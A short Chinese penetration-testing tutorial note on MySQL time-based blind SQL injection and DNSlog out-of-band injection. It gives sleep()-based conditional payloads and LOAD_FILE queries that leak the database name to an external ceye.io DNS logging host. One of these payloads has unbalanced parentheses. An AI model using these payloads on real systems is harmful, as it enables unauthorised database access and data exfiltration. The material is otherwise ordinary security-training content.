渗透测试 day4

时间盲注

原理:构造语句,通过页面响应的时长,来判断信息。

方法:构造逻辑语句,通过条件语句进行判断,为真则立即执行,否则延时执行

核心语法:

if(left(user(),1)=’a’,0,sleep(3));

 渗透测试 day4

 

 

 

Dnslog盲注

dnslog是用户访问网站过程中被dns服务记录的信息

原理: 通过布尔或时间盲注效率很低,需要发送很多的请求进行判断,很可能触发安全设备的防护,我们需要一种方式,减少请求,直接回显数据,这里就使用dnslog实现注入。

 

dnslog平台 :http://ceye.io/

mysql LOAD_FILE函数可以发起请求:

SELECT LOAD_FILE(CONCAT(‘\\’,’test’,’.mysql.d1egqb.ceye.io\abc’));

方法:

构造语句,利用load_file()函数发起请求,使用dnslog接受请求,获取数据

核心语法:

SELECT LOAD_FILE(CONCAT(‘\\’,select database()),’.mysql.d1egqb.ceye.io\abc’));

 渗透测试 day4

 

 

load_file()函数只能在windows操作系统上使用,linux操作系统不能使用

 

 

原文链接:https://www.cnblogs.com/liuyuanzzz/p/11679925.html

原创文章,作者:优速盾-小U,如若转载,请注明出处:https://www.cdnb.net/bbs/archives/20738

(0)
上一篇 2023年8月11日 20:44
下一篇 2023年8月11日

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

优速盾注册领取大礼包www.cdnb.net
/sitemap.xml